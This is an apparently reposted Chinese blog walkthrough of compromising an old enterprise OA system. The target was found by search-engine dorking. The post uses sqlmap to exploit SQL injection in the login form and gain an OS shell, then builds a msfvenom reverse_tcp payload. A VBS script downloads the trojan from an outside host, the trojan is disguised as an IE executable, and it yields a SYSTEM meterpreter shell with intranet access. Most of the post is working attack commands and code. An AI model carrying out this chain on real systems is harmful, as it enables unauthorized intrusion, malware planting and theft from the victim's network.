某OA系统SYSTEM权限SQL注入

0x01 发现漏洞 七月正值暑假，闲暇时光在百度上inurl一番，找到了一个古老的企业OA系统 IP站点，没有域名，扫过一眼，.NET流行时代的普遍漏洞浮现在脑海里——SQL注入 在用户名里输入admin’，不负期望地报了错 很明显，前后端都没有对用户的输入进行过滤，直接将’带入了SQL语句进行。初步判断，此OA系统存在SQL注入漏洞。 0x02 漏洞验证 打开BurpSuite，设置好浏览器代理，抓下HTTP请求，一气呵成。 问题参数为 txtLogin=admin%27，可将整个请求复制到 test.txt，使用sqlmap -r 来注入 sqlmap -u http://x.x.x.x/xx.aspx --forms 至此，可以确认存在error-based、stack quires和time-based三个类型的漏洞 0x03 判断数据库用户的权限 发现SQL注入后，首先要判断权限，高权限的注入可以为后续渗透省下很大功夫 sqlmap -u http://x.x.x.x/xx.aspx --forms --is-dba 非常nice，再次不负期望地返回了DBA权限，输入以下命令，获得一个shell sqlmap -u http://x.x.x.x/xx.aspx --forms --os-shell NT/SYSTEM权限，时隔两个多月，复现有误，不予贴图 0x04 反弹shell 深入内网 生成一个shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx > /var/www/html/shell.exe 由于环境艰难，不能直接上传文件，我选择了用vbs脚本来下载木马到服务器 代码如下： Set post=CreateObject("Msxml2.XMLHTTP")post.Open "GET","http://x.x.x.x/shell.exe"'发送请求post.Send()Set aGet = CreateObject("ADODB.Stream")aGet.Mode = 3aGet.Type = 1aGet.Open()'等待3秒，等文件下载wscript.sleep 3000 aGet.Write(post.responseBody)'写数据aGet.SaveToFile "shell.exe",2 用echo命令缓慢地写完了vbs脚本之后，顺利运行，下载了木马 更改名字，移动到IE安装目录进行伪装 start iee.exe 运行木马，metasploit成功收到了SYSTEM权限的shell 该主机拥有内网IP，存在内网，可以互通，并且该主机作为中央数据库 此内网主机皆为VMware虚拟机 0x05 结束测试，提交漏洞 本次集群智慧云安服渗透测试成功拿到最高权限， 到此为止，不再深入。 随着攻击与防御技术的彼此攀升，程序员的安全意识逐渐提高，SQL也越来越少。 但不少粗糙的程序和古老的系统仍然存在此漏洞，此类漏洞解决方法简单，只用对用户输入参数稍加处理即可。 文章来源：Woojay's Blog原文地址：https://blog.blankshell.com/2019/09/12/某oa系统从system权限命令执 黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！ 如侵权请私聊我们删文 END